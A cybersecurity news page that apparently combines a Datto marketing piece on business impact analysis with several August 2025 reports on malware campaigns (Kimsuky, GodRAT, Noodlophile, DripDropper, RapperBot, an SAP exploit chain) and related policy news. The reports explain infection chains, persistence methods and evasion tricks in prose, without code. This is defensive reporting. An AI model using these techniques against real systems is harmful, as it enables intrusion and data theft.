Tag: Cyber Security

Modern businesses face a rapidly evolving and expanding threat landscape, but what does this mean for your business? It means a growing number of risks, along with an increase in their frequency, variety, complexity, severity, and potential business impact.

The real question is, “How do you tackle these rising threats?” The answer lies in having a robust BCDR strategy. However, to build a rock-solid BCDR plan, you must first conduct a business impact analysis (BIA). Read on to learn what BIA is and how it forms the foundation of an effective BCDR strategy.

What Is a BIA?

A BIA is a structured approach to identifying and evaluating the operational impact of disruptions across departments. Disruptive incidents or emergencies can occur due to several factors, such as cyberattacks, natural disasters or supply chain issues.

Conducting a BIA helps identify critical functions for a business’s operations and survival. Businesses can use insights from BIA to develop strategies to resume those functions first to maintain core services in the event of a crisis.

It informs key priorities, such as RTO/RPO SLAs, and aligns technological capabilities proportionally with the level of threat and risk, which are critical for continuity and recovery planning.

The IT Leader’s Role in Enabling an Effective BIA

While business continuity, risk, or compliance teams often lead business impact analysis, IT leaders play a crucial role in making it work. They bring critical visibility into system dependencies and infrastructure across the organization. They provide valuable insights into what’s technically feasible when disaster strikes. IT leaders also play a key part in validating recovery commitments, whether the set RTO and RPO goals can be achieved within the current infrastructure, or if upgrades are needed.

IT leaders operationalize the recovery strategy with appropriate tooling, from selecting and configuring DR tools to automating failover processes. This helps ensure the recovery plan is executable, integrated into everyday operations, tested and ready to scale with the business.

In SMBs or IT-led orgs, IT often leads the BIA by necessity. Because of their cross-functional view of operations, infrastructure and business continuity, IT leaders are uniquely positioned to drive the BIA.

Pro Tip: IT’s involvement ensures the BIA isn’t just a business document; it becomes an actionable recovery plan.

Identifying Threat Vectors

Before you can protect what matters, you must understand what threatens it. Assess the threat landscape facing your organization and tailor your response plan based on industry, geographic risk and operational profile.

Here are the key threat vectors to consider:

• Cyberthreats: From ransomware to insider threats and credential compromise, cyberattacks are growing in complexity, frequency and severity. One weak point in your defense systems can lead to massive data loss and operational downtime.
• Natural Disasters: Events like hurricanes, wildfires, floods and earthquakes strike fast and hard. The effects of these events can ripple across regions, disrupting supply chains, data centers and physical offices.
• Operational Disruptions: Unexpected outages due to power failure, software bugs or network downtime can bring daily operations to a grinding halt if you aren’t prepared.
• Human Error: Anyone, including your best employees, can make mistakes. Accidental deletions or misconfigurations can lead to costly downtime.
• Regulatory and Compliance Risks: Data breaches and data loss can not only hurt your business financially but also lead to legal issues and compliance violations.

Fig 1: Impact analysis of different threats

Industry-specific risks

Every sector operates in its own unique way and relies on different systems to stay up and running. Certain threats can hinder those systems and core functions more than others. Here are a few examples to guide you in identifying and prioritizing threats based on industry.

Healthcare

If you operate in the healthcare sector, ransomware and system availability must be your top priorities since any disruption or downtime can directly impact patient care and safety. As regulations like HIPAA get more stringent, data protection and privacy become critical to meet compliance requirements.

Education

Phishing and account compromise attacks targeting staff and students are common in the education sector. Additionally, the rise of hybrid learning environments has expanded the threat surface, stretching across student endpoints, SaaS platforms and on-premises servers. To make matters more challenging, many institutions operate with limited IT staff and resources, making them more vulnerable to human error, slower threat detection and delayed response times.

Manufacturing and Logistics

In manufacturing and logistics, operational technology (OT) uptime is mission-critical as downtime caused by power failures, network outages or system disruptions can halt production lines and delay deliveries. Unlike traditional IT environments, many OT systems aren’t easily backed up or virtualized, requiring specific DR considerations. Moreover, any disruption to just-in-time (JIT) supply chains can delay inventory, increase costs and jeopardize vendor relationships.

As you build your BIA threat matrix, score each threat by likelihood and impact:

• What’s the chance this will occur in the next one to three years?
• If it happens, what systems, people and business functions will it affect?
• Can this threat create a cascading failure?

Prioritization helps you focus recovery resources where the risk is highest and the cost of downtime is greatest.

Running the BIA

Follow these steps to conduct a BIA to strengthen your recovery strategy:

1. Identify and List Critical Business Functions

Knowing what matters most for your business’s survival is critical for designing effective BCDR plans that align with your business requirements.

• Work with department heads to identify critical business functions and associate them with the IT assets, apps and services that support them.

2. Assess the Impact of Downtime

Downtime, depending on the duration, can severely or mildly impact business operations.

• It’s important to evaluate the consequences across revenue, compliance, productivity and reputation.
• Categorize business functions by impact severity (e.g., high, medium, low).

3. Define RTOs and RPOs

RTOs and RPOs are critical benchmarks that define how quickly your systems must be restored and how much data loss your organization can endure.

Work with business and technical teams to establish:

• RTO: Maximum acceptable downtime.
• RPO: Maximum acceptable data loss.

4. Prioritize Systems and Data

When the unexpected occurs, being able to recover quickly can help maintain business continuity and minimize downtime risks.

• Create a backup and recovery plan by linking impact tiers with IT assets and applications they rely on.

5. Document Dependencies

Documenting dependencies between business functions and IT systems is important to understand the critical links between them, ensure accurate impact assessments and drive effective recovery planning.

• Include infrastructure, SaaS tools, third-party integrations and interdependent apps.

Turn Insights Into Action With Datto BCDR

A well-executed BIA lays the foundation for a resilient, recovery-ready organization. It provides the essential data to make risk-based, cost-effective decisions. While BIA offers valuable insights into recovery objectives, dependencies and risks, Datto turns those insights into automated, repeatable recovery actions.

Datto provides a unified platform for backup, disaster recovery, ransomware detection, business continuity and disaster recovery orchestration. It offers policy-based backups, allowing you to use RTO and RPO findings to assign backup frequency and retention. You can create tiered backup schedules based on criticality to strengthen data protection, optimize resources and costs, and ensure fast, targeted recovery.

Datto’s Inverse Chain Technology and image-based backups reduce storage footprint while maximizing recovery performance by storing every previous recovery point in an independent, fully constructed state on the Datto device or the Datto cloud. They simplify backup chain management and speed up recovery.

Datto 1-Click Disaster Recovery lets you test and define DR runbooks in the Datto Cloud that are executable with just a single click.

Whether you are protecting data stored on endpoints, SaaS platforms or on-premises servers, Datto has you covered. It regularly validates recovery configurations with screenshots and test results, and uses test automation to verify that you meet RTOs under real conditions.

Datto detects abnormal file change behavior to protect your backups and prevent them from being corrupted by ransomware. It seamlessly integrates with BCDR workflows to support rapid recovery to the pre-attack state.

In a fast-changing business environment where threats loom large and operational downtime isn’t an option, resilience is your competitive advantage. The BIA is your map, and Datto is your vehicle.

Get customized Datto BCDR pricing today. Discover how our solutions help you stay operational and secure, regardless of the circumstances.

North Korean threat actors have been attributed to a coordinated cyber espionage campaign targeting diplomatic missions in their southern counterpart between March and July 2025.

The activity manifested in the form of at least 19 spear-phishing emails that impersonated trusted diplomatic contacts with the goal of luring embassy staff and foreign ministry personnel with convincing meeting invites, official letters, and event invitations.

“The attackers leveraged GitHub, typically known as a legitimate developer platform, as a covert command-and-control channel,” Trellix researchers Pham Duy Phuc and Alex Lanstein said.

The infection chains have been observed to rely on trusted cloud storage solutions like Dropbox and Daum Cloud, an online service from South Korean internet conglomerate Kakao Corporation, in order to deliver a variant of an open-source remote access trojan called Xeno RAT that grants the threat actors to take control of compromised systems.

The campaign is assessed to be the work of a North Korean hacking group called Kimsuky, which was recently linked to phishing attacks that employ GitHub as a stager for an Xeno RAT known as MoonPeak. Despite the infrastructure and tactical overlaps, there are indications that the phishing attacks match China-based operatives.

The email messages, per Trellix, are carefully crafted to appear legitimate, often spoofing real diplomats or officials so as to entice recipients into opening password-protected malicious ZIP files hosted on Dropbox, Google Drive, or Daum. The messages are written in Korean, English, Persian, Arabic, French, and Russian.

“The spear-phishing content was carefully crafted to mimic legitimate diplomatic correspondence,” Trellix said. “Many emails included official signature, diplomatic terminology, and references to real events (e.g., summits, forums, or meetings).”

“The attackers impersonated trusted entities (embassies, ministries, international organizations), a long-running Kimsuky tactic. By strategically timing lures alongside real diplomatic happenings, they enhanced the credibility.”

Present within the ZIP archive is a Windows shortcut (LNK) masquerading as a PDF document, launching which results in the execution of PowerShell code that, in turn, runs an embedded payload, which reaches out to GitHub for fetching next-stage malware and establishes persistence through scheduled tasks. In parallel, a decoy document is displayed to the victims.

The script is also designed to harvest system information and exfiltrate the details to an attacker-controlled private GitHub repository, while simultaneously retrieving additional payloads by parsing the contents of a text file (“onf.txt”) in the repository to extract the Dropbox URL hosting the MoonPeak trojan.

“By simply updating onf.txt in the repository (pointing to a new Dropbox file), the operators could rotate payloads to infected machines,” Trellix explained.

“They also practiced ‘rapid’ infrastructure rotation: log data suggests that the ofx.txt payload was updated multiple times in an hour to deploy malware and to remove traces after use. This rapid update cycle, combined with the use of cloud infrastructure, helped the malicious activities fly under the radar.”

Interestingly, the cybersecurity company’s time-based analysis of the attackers’ activity has found it to be largely originating from a timezone that’s consistent with China, with a smaller proportion aligning with that of the Koreas. To add to the intrigue, a “perfect 3-day pause” was observed coinciding with Chinese national holidays in early April 2025, but not during North or South Korean holidays.

This has raised the possibility that the campaign, mirroring Chinese operational cadence while operating with motives that align with North Korea, is likely the result of –

• North Korean operatives working from Chinese territory
• A Chinese APT operation mimicking Kimsuky techniques, or
• A collaborative effort leveraging Chinese resources for North Korean intelligence gathering efforts

With North Korean cyber actors frequently stationed in China and Russia, as observed in the case of the remote information technology (IT) worker fraud scheme, Trellix said with medium-confidence that the operators are operating from China or are culturally Chinese.

“The use of Korean services and infrastructure was likely intentional to blend into the South Korean network,” Trellix said. “It’s a known Kimsuky trait to operate out of Chinese and Russian IP space while targeting South Korea, often using Korean services to mask their traffic as legitimate.”

N. Korea IT Worker Infiltrates 100s of Companies

The disclosure comes as CrowdStrike revealed that it has identified more than 320 incidents over the past 12 months where North Koreans posing as remote IT workers have infiltrated companies to generate illicit revenue for the regime, a 220% jump from last year.

The IT worker scheme, tracked as Famous Chollima and Jasper Sleet, is believed to use generative artificial intelligence (GenAI) coding assistants like Microsoft Copilot or VSCodium and translation tools to help assist with their daily tasks and respond to instant messages and emails. They are also likely to work three or four jobs simultaneously.

A crucial component of these operations encompasses recruiting people to run laptop farms, which include racks of corporate laptops used by the North Koreans to remotely do their work using tools like AnyDesk as if they were physically located in the country where the companies are based.

“Famous Chollima IT workers use GenAI to create attractive résumés for companies, reportedly use real-time deepfake technology to mask their true identities in video interviews, and leverage AI code tools to assist in their job duties, all of which pose a substantial challenge to traditional security defenses,” the company said.

What’s more, a leak of 1,389 email addresses linked to the IT workers has uncovered that 29 of the 63 unique email service providers are online tools that allow users to create temporary or disposable email addresses, while another six are related to privacy-focused services like Skiff, Proton Mail, and SimpleLogin. Nearly 89% of the email addresses are Gmail accounts.

“All the Gmail accounts are guarded using Google Authenticator, 2FA, and Recovery BackUp Email,” security researcher Rakesh Krishnan said. “Many usernames include terms like developer, code, coder, tech, software, indicating a tech or programming focus.”

Some of these email addresses are present in a user database leak of the AI photo editing tool Cutout.Pro, suggesting potential use of the software to alter images for social media profiles or identification documents.

Aug 20, 2025Ravie LakshmananBotnet / Cybercrime

A 22-year-old man from the U.S. state of Oregon has been charged with allegedly developing and overseeing a distributed denial-of-service (DDoS)-for-hire botnet called RapperBot.

Ethan Foltz of Eugene, Oregon, has been identified as the administrator of the service, the U.S. Department of Justice (DoJ) said. The botnet has been used to carry out large-scale DDoS-for-hire attacks targeting victims in over 80 countries since at least 2021.

Foltz has been charged with one count of aiding and abetting computer intrusions. If convicted, he faces a maximum penalty of 10 years in prison. In addition, law enforcement authorities conducted a search of Foltz’s residence on August 6, 2025, seizing administrative control of the botnet infrastructure.

“RapperBot, aka ‘Eleven Eleven Botnet’ and ‘CowBot,’ is a Botnet that primarily compromises devices like Digital Video Recorders (DVRS) or Wi-Fi routers at scale by infecting those devices with specialized malware,” the DoJ said.

“Clients of Rapper Bot then issue commands to those infected victim devices, forcing them to send large volumes of ‘distributed denial-of-service’ (DDoS) traffic to different victim computers and servers located throughout the world.”

Heavily inspired by fBot (aka Satori) and Mirai botnets, RapperBot is known for its ability to break into target devices using SSH or Telnet brute-force attacks and co-opt them into a malicious network capable of launching DDoS attacks. It was first publicly documented by Fortinet in August 2022, with early campaigns observed as far back as May 2021.

A 2023 report from Fortinet detailed the DDoS botnet’s expansion into cryptojacking, profiting off the compromised devices’ compute resources to illicitly mine Monero and maximize value. Earlier this year, RapperBot was also implicated in DDoS attacks targeting DeepSeek and X.

Foltz and his co-conspirators have been accused of monetizing RapperBot by providing paying customers access to a powerful DDoS botnet that has been used to conduct over 370,000 attacks, targeting 18,000 unique victims across China, Japan, the United States, Ireland and Hong Kong from April 2025 to early August.

Prosecutors also allege that the botnet comprised roughly 65,000 to 95,000 infected victim devices to pull off DDoS attacks that measured between two and three Terabits per second (Tbps), with the largest attack likely exceeding 6 Tbps. Furthermore, the botnet is believed to have been used to carry out ransom DDoS attacks aiming to extort victims.

The investigation traced the botnet to Foltz after uncovering IP address links to various online services used by the defendant, including PayPal, Gmail, and the internet service provider. Foltz is also said to have searched on Google for references to “RapperBot” or “Rapper Bot” over 100 times.

The disruption of RapperBot is part of Operation PowerOFF, an ongoing international effort that’s designed to dismantle criminal DDoS-for-hire infrastructures worldwide.

Aug 19, 2025Ravie LakshmananLinux / Malware

Threat actors are exploiting a nearly two-year-old security flaw in Apache ActiveMQ to gain persistent access to cloud Linux systems and deploy malware called DripDropper.

But in an unusual twist, the unknown attackers have been observed patching the exploited vulnerability after securing initial access to prevent further exploitation by other adversaries and evade detection, Red Canary said in a report shared with The Hacker News.

“Follow-on adversary command-and-control (C2) tools varied by endpoint and included Sliver, and Cloudflare Tunnels to maintain covert command and control over the long term,” researchers Christina Johns, Chris Brook, and Tyler Edmonds said.

The attacks exploit a maximum-severity security flaw in Apache ActiveMQ (CVE-2023-46604, CVSS score: 10.0), a remote code execution vulnerability that could be exploited to run arbitrary shell commands. It was addressed in late October 2023.

The security defect has since come under heavy exploitation, with multiple threat actors leveraging it to deploy a wide range of payloads, including HelloKitty ransomware, Linux rootkits, GoTitan botnet malware, and Godzilla web shell.

In the attack activity detected by Red Canary, the threat actors have been observed leveraging the access to modify existing sshd configurations to enable root login, granting them elevated access to drop a previously unknown downloader dubbed DripDropper.

A PyInstaller Executable and Linkable Format (ELF) binary, DripDropper requires a password to run in a bid to resist analysis. It also communicated with an attacker-controlled Dropbox account, once again illustrating how threat actors are increasingly relying on legitimate services to blend in with regular network activity and sidestep detection.

The downloader ultimately serves as a conduit for two files, one of which facilitates a varied set of actions on different endpoints, ranging from process monitoring to contacting Dropbox for further instructions. Persistence of the dropped file is achieved by modifying the 0anacron file present in /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly, /etc/cron.monthly directories.

The second file dropped by DripDropper is also designed to contact Dropbox for receiving commands, while also altering existing configuration files related to SSH, likely as a backup mechanism for persistent access. The final stage entails the attacker downloading from Apache Maven patches for CVE-2023-46604, effectively plugging the flaw.

“Patching the vulnerability does not disrupt their operations as they already established other persistence mechanisms for continued access,” the researchers said.

While certainly rare, the technique is not new. Last month, France’s national cybersecurity agency ANSSI detailed a China-nexus initial access broker employing the same approach to secure access to systems and prevent other threat actors from using the shortcomings to get in and mask the initial access vector used in the first place.

The campaign offers a timely reminder for why organizations need to apply patches in a timely fashion, limit access to internal services by configuring ingress rules to trusted IP addresses or VPNs, and monitor logging for cloud environments to flag anomalous activity.

Aug 19, 2025Ravie LakshmananMalware / Cyber Attack

Financial institutions like trading and brokerage firms are the target of a new campaign that delivers a previously unreported remote access trojan called GodRAT.

The malicious activity involves the “distribution of malicious .SCR (screen saver) files disguised as financial documents via Skype messenger,” Kaspersky researcher Saurabh Sharma said in a technical analysis published today.

The attacks, which have been active as recently as August 12, 2025, employ a technique called steganography to conceal within image files shellcode used to download the malware from a command-and-control (C2) server. The screen saver artifacts have been detected since September 9, 2024, targeting countries and territories like Hong Kong, the United Arab Emirates, Lebanon, Malaysia, and Jordan.

Assessed to be based on Gh0st RAT, GodRAT follows a plugin-based approach to augment its functionality in order to harvest sensitive information and deliver secondary payloads like AsyncRAT. It’s worth mentioning that Gh0st RAT had its source code leaked publicly in 2008 and has since been adopted by various Chinese hacking groups.

The Russian cybersecurity company said the malware is an evolution of another Gh0st RAT-based backdoor known as AwesomePuppet that was first documented in 2023 and is likely believed to be the handiwork of the prolific Chinese threat actor, Winnti (aka APT41).

The screen saver files act as a self-extracting executable incorporating various embedded files, including a malicious DLL that’s sideloaded by a legitimate executable. The DLL extracts shellcode hidden within a .JPG image file that then paves the way for the deployment of GodRAT.

The trojan, for its part, establishes communication with the C2 server over TCP, collects system information, and pulls the list of installed antivirus software on the host. The captured details are sent to the C2 server, after which the server responds with follow-up instructions that allow it to –

• Inject a received plugin DLL into memory
• Close the socket and terminate the RAT process
• Download a file from a provided URL and launch it using the CreateProcessA API
• Open a given URL using the shell command for opening Internet Explorer

One of the plugins downloaded by the malware is a FileManager DLL that can enumerate the file system, perform file operations, open folders, and even run searches for files at a specified location. The plugin has also been used to deliver additional payloads, such as a password stealer for Google Chrome and Microsoft Edge browsers and the AsyncRAT trojan.

Kaspersky said it discovered the complete source code for the GodRAT client and builder that was uploaded to the VirusTotal online malware scanner in late July 2024. The builder can be used to generate either an executable file or a DLL.

When the executable option is chosen, users have the choice of selecting a legitimate binary from a list to which the malicious code is injected into: svchost.exe, cmd.exe, cscript.exe, curl.exe, wscript.exe, QQMusic.exe and QQScLauncher.exe. The final payload can be saved with one of the following file types: .exe, .com, .bat, .scr, and .pif.

“Old implant codebases, such as Gh0st RAT, which are nearly two decades old, continue to be used today,” Kaspersky said. “These are often customized and rebuilt to target a wide range of victims.”

“These old implants are known to have been used by various threat actors for a long time, and the GodRAT discovery demonstrates that legacy codebases like Gh0st RAT can still maintain a long lifespan in the cybersecurity landscape.”

Aug 19, 2025Ravie LakshmananVulnerability / Cyber Espionage

A new exploit combining two critical, now-patched security flaws in SAP NetWeaver has emerged in the wild, putting organizations at risk of system compromise and data theft.

The exploit in question chains together CVE-2025-31324 and CVE-2025-42999 to bypass authentication and achieve remote code execution, SAP security company Onapsis said.

• CVE-2025-31324 (CVSS score: 10.0) – Missing Authorization check in SAP NetWeaver’s Visual Composer development server
• CVE-2025-42999 (CVSS score: 9.1) – Insecure Deserialization in SAP NetWeaver’s Visual Composer development server

The vulnerabilities were addressed by SAP back in April and May 2025, but not before they were abused by threat actors as zero-days since at least March.

Multiple ransomware and data extortion groups, including Qilin, BianLian, and RansomExx, have been observed weaponizing the flaws, not to mention several China-nexus espionage crews who have also put them to use in attacks targeting critical infrastructure networks.

The existence of the exploit was first reported last week by vx-underground, which said it was released by Scattered Lapsus$ Hunters, a new fluid alliance formed by Scattered Spider and ShinyHunters.

“These vulnerabilities allow an unauthenticated attacker to execute arbitrary commands on the target SAP System, including the upload of arbitrary files,” Onapsis said. “This can lead to remote code execution (RCE) and a complete takeover of the affected system and SAP business data and processes.”

The exploit, the company added, cannot only be used to deploy web shells, but also be weaponized to conduct living-off-the-land (LotL) attacks by directly executing operating system commands without having to drop additional artifacts on the compromised system. These commands are run with SAP administrator privileges, granting bad actors unauthorized access to SAP data and system resources.

Specifically, the attack chain first uses CVE-2025-31324 to sidestep authentication and upload the malicious payload to the server. The deserialization vulnerability (CVE-2025-42999) is then exploited to unpack the payload and execute it with elevated permissions.

“The publication of this deserialization gadget is particularly concerning due to the fact that it can be reused in other contexts, such as exploiting the deserialization vulnerabilities that were recently patched by SAP in July,” Onapsis warned.

This includes –

Describing the threat actors as having extensive knowledge of SAP applications, the company is urging SAP users to apply the latest fixes as soon as possible, review and restrict access to SAP applications from the internet, and monitor SAP applications for any signs of compromise.

After two decades of developing increasingly mature security architectures, organizations are running up against a hard truth: tools and technologies alone are not enough to mitigate cyber risk. As tech stacks have grown more sophisticated and capable, attackers have shifted their focus. They are no longer focusing on infrastructure vulnerabilities alone. Instead, they are increasingly exploiting human behavior. In most modern breaches, the initial attack vector is not a zero-day technology exploit. It’s exploiting vulnerabilities in people.

The data is well-documented. For five years running, Verizon’s Data Breach Investigations Report has shown that human risk represents the greatest driver of breaches globally. The latest version of the report found that nearly 60% of all breaches in 2024 involved a human element. However, in that context, it’s important to address a common misconception. The phrase “people are the weakest link” implies that employees are at fault when breaches arise. In most cases, that isn’t the issue. Users aren’t failing at security, their security environment is failing them. Too often, security is made unnecessarily complex. Concepts are communicated in a confusing and overwhelming technical language while policies are designed for auditors and lawyers, not the average employee.

In turn, effectively mitigating human risk isn’t a matter of just more technology adoption or policy enforcement. It’s about cultivating a strong organizational security culture that simplifies and supports secure human behavior. Until security culture is treated with the same prioritization and investment as your security technology, human risk will continue to undermine even the best-designed technical programs.

Defining Security Culture

Every organization already has a security culture in place. The key question is if it’s the security culture they actually want.

Security culture, by definition, is the shared perceptions, beliefs, and attitudes about cybersecurity across the organization. Do people believe security is important? Do they feel responsible? Do they see themselves as a target? When that belief structure is strong, behavior follows. But when it’s missing, like when security is seen as someone else’s job or an obstacle to productivity, your degree of risk grows exponentially.

The problem isn’t that people don’t care about protecting their organization. It’s that security isn’t embedded into how they work, instead layered on top as something they’re expected to navigate around. If we want people to behave securely, we need to create conditions that support those behaviors. Employees adjust their behavior based on what the environment rewards, enables, and expects. Security is no different. To strengthen security culture, the focus should be on designing a day-to-day environment that shapes people’s perceptions and decisions.

In practice, this means evaluating the four biggest drivers of your security culture: leadership signals, security team engagement, policy design, and security training.

1. Leadership signals: Culture starts at the top. If leaders treat security as a priority by budgeting for it, tying it to bonuses, or elevating the CISO in the org chart, it sends a clear message. If they don’t, no amount of lip service will change that perception.
2. Security team engagement: It’s not just executives who shape culture. The day-to-day experience people have with security often depends on the security team itself. Is the security team helpful or hostile? Are they clear or confusing? Are they enablers or blockers? All of that matters.
3. Policy design: Policies are a constant point of interaction. If they’re overly technical, hard to follow, or full of friction, they erode trust. If they’re simple and intuitive, they reinforce the idea that security is achievable.
4. Security training: This is often the most visible part of a program, but also the most misunderstood. If your training is boring, outdated, or irrelevant, it signals that security doesn’t really matter. When engaging and applicable, it builds belief that drives behavior.

These four areas also provide a framework for measuring your culture. Ask your employees what they think and feel about leadership, the security team, policies, and training. Their answers will tell you whether your culture is working for you or against you.

Aligning the Four Levers of Security Culture

Executive support may set the tone, but security culture is defined by what employees encounter day to day. If those lived experiences are inconsistent with leadership’s message, belief breaks down. People may hear that security is a priority, but if policies are unclear, training feels disconnected, or security teams are rigid and unapproachable, trust erodes quickly.

This is why alignment across all four cultural levers – leadership, security team engagement, policy, and training – is essential. When leadership visibly prioritizes security, through resourcing and accountability, it signals strategic importance. But that message needs to be reinforced by how the security team interacts with the workforce. If employees feel punished for mistakes or stonewalled when they ask for support, they are less inclined to be active participants in defending the organization.

Policy design plays an equally important role. When policies are long, technical, or impractical, employees will default to convenience even if it introduces risk. Simpler, more intuitive guidance makes it easier to act securely without slowing down business outcomes. The same principle applies to training. If it’s outdated or generic, it becomes a check-the-box exercise. But when it’s relevant and role-specific, it helps reinforce that security is part of the job—not an add-on to it.

Ready to Operationalize Your Security Culture?

Join me this fall at SANS Orlando Fall 2025, where I’ll be teaching the newly updated LDR521: Security Culture for Leaders. This course offers a step-by-step framework to assess your current culture, identify the top opportunities for change, and build an environment where secure behavior is the norm. You’ll leave with practical tools, real-world case studies, and a leadership-ready playbook you can take back to your team.

Register for SANS Orlando Fall 2025 here.

Note: This article was contributed by Lance Spitzner, Senior Instructor with the SANS Institute. Learn more about his background and experience here.

Aug 19, 2025Ravie LakshmananEncryption / Cloud Security

The U.K. government has apparently abandoned its plans to force Apple to weaken encryption protections and include a backdoor that would have enabled access to the protected data of U.S. citizens.

U.S. Director of National Intelligence (DNI) Tulsi Gabbard, in a statement posted on X, said the U.S. government had been working with its partners with the U.K. over the past few months to ensure that Americans’ civil liberties are protected.

“As a result, the UK has agreed to drop its mandate for Apple to provide a ‘backdoor’ that would have enabled access to the protected encrypted data of American citizens and encroached on our civil liberties,” Gabbard said.

The development comes after Apple switched off its Advanced Data Protection (ADP) feature for iCloud in the U.K. earlier this February, following government demands for backdoor access to encrypted user data.

“We are gravely disappointed that the protections provided by ADP will not be available to our customers in the U.K., given the continuing rise of data breaches and other threats to customer privacy,” the company was quoted as saying to Bloomberg at the time.

“As we have said many times before, we have never built a backdoor or master key to any of our products or services, and we never will.”

The secret order to require Apple to implement a “backdoor” came in the form of a technical capability notice (TCN) issued by the U.K. Home Office under the Investigatory Powers Act (IPA) to enable blanket access to end-to-end encrypted cloud data, even for users outside the country. The order was issued in January 2025.

Critics have argued that enabling access to encrypted cloud data, including backups, essentially amounts to building a backdoor that could be exploited by cybercriminals and authoritarian governments.

Apple has since appealed the legality of the order, with the Investigatory Powers Tribunal (IPT) denying the Home Office’s attempts to keep the case a secret.

Late last month, Google told TechCrunch that, unlike Apple, it did not receive any request from the U.K. to weaken encryption protections and allow authorities access to customer data.

In a new letter sent to Gabbard, Senator Ron Wyden said Meta “offered an unequivocal denial […] stating that “we have not received an order to backdoor our encrypted services, like that reported about Apple.’”

Aug 19, 2025Ravie LakshmananSupply Chain Security

The maintainers of the Python Package Index (PyPI) repository have announced that the package manager now checks for expired domains to prevent supply chain attacks.

“These changes improve PyPI’s overall account security posture, making it harder for attackers to exploit expired domain names to gain unauthorized access to accounts,” Mike Fiedler, PyPI safety and security engineer at the Python Software Foundation (PSF), said.

With the latest update, the intention is to tackle domain resurrection attacks, which occur when bad actors purchase an expired domain and use it to take control of PyPI accounts through password resets.

PyPI said it has unverified over 1,800 email addresses since early June 2025, as soon as their associated domains entered expiration phases. While this is not a foolproof solution, it helps plug a significant supply chain attack vector that would otherwise appear legitimate and hard to detect, it added.

Email addresses are tied to domain names that, in turn, can lapse, if left unpaid – a critical risk for packages distributed via open-source registries. The threat is magnified if those packages have long been abandoned by their respective maintainers, but are still in a fair amount of use by downstream developers.

PyPI users are required to verify their email addresses during the account registration phase, thus ensuring that the provided addresses are valid and accessible to them. But this layer of defense is effectively neutralized should the domain expire, thus allowing an attacker to purchase the same domain and initiate a password reset request, which would land in their inbox (as opposed to the actual owner of the package).

From there, all the threat actor has to do is follow through the steps to gain access to the account with that domain name. The threat posed by expired domains arose in 2022, when an unknown attacker acquired the domain used by the maintainer of the ctx PyPI package to gain access to the account and publish rogue versions to the repository.

The latest safeguard added by PyPI aims to prevent this kind of account takeover (ATO) scenario and “minimize potential exposure if an email domain does expire and change hands, regardless of whether the account has 2FA enabled.” It’s worth noting that the attacks are only applicable to accounts that have registered using email addresses with a custom domain name.

PyPI said it’s making use of Fastly’s Status API to query the status of a domain every 30 days and mark the corresponding email address as unverified if it has expired.

Users of the Python package manager are being advised to enable two-factor authentication (2FA) and add a second verified email address from another notable domain, such as Gmail or Outlook, if the accounts only have a single verified email address from a custom domain name.

Aug 18, 2025Ravie LakshmananMalware / Enterprise Security

The threat actors behind the Noodlophile malware are leveraging spear-phishing emails and updated delivery mechanisms to deploy the information stealer in attacks aimed at enterprises located in the U.S., Europe, Baltic countries, and the Asia-Pacific (APAC) region.

“The Noodlophile campaign, active for over a year, now leverages advanced spear-phishing emails posing as copyright infringement notices, tailored with reconnaissance-derived details like specific Facebook Page IDs and company ownership information,” Morphisec researcher Shmuel Uzan said in a report shared with The Hacker News.

Noodlophile was previously detailed by the cybersecurity vendor in May 2025, uncovering the attackers’ use of fake artificial intelligence (AI)-powered tools as lures to propagate the malware. These counterfeit programs were found to be advertised on social media platforms like Facebook.

That said, the adoption of copyright infringement lures is not a new development. Back in November 2024, Check Point uncovered a large-scale phishing operation that targeted individuals and organizations under the false premise of copyright infringement violations to drop the Rhadamanthys Stealer.

But the latest iteration of the Noodlophile attacks exhibits notable deviation, particularly when it comes to the use of legitimate software vulnerabilities, obfuscated staging via Telegram, and dynamic payload execution.

It all starts with a phishing email that seeks to trick employees into downloading and running malicious payloads by inducing a false sense of urgency, claiming copyright violations on specific Facebook Pages. The messages originate from Gmail accounts in an effort to evade suspicion.

Present within the message is a Dropbox link that drops a ZIP or MSI installer, which, in turn, sideloads a malicious DLL using legitimate binaries associated with Haihaisoft PDF Reader to ultimately launch the obfuscated Noodlophile stealer, but not before running batch scripts to establish persistence using Windows Registry.

What’s notable about the attack chain is that it leverages Telegram group descriptions as a dead drop resolver to fetch the actual server (“paste[.]rs”) that hosts the stealer payload to challenge detection and takedown efforts.

“This approach builds on the previous campaign’s techniques (e.g., Base64-encoded archives, LOLBin abuse like certutil.exe), but adds layers of evasion through Telegram-based command-and-control and in-memory execution to avoid disk-based detection,” Uzan said.

Noodlophile is a full-fledged stealer that can capture data from web browsers and gather system information. Analysis of the stealer source code indicates ongoing development efforts to expand on its capabilities to facilitate screenshot capture, keylogging, file exfiltration, process monitoring, network information gathering, file encryption, and browser history extraction.

“The extensive targeting of browser data underscores the campaign’s focus on enterprises with significant social media footprints, particularly on platforms like Facebook,” Morphisec said. “These unimplemented functions indicate that the stealer’s developers are actively working to expand its capabilities, potentially transforming it into a more versatile and dangerous threat.”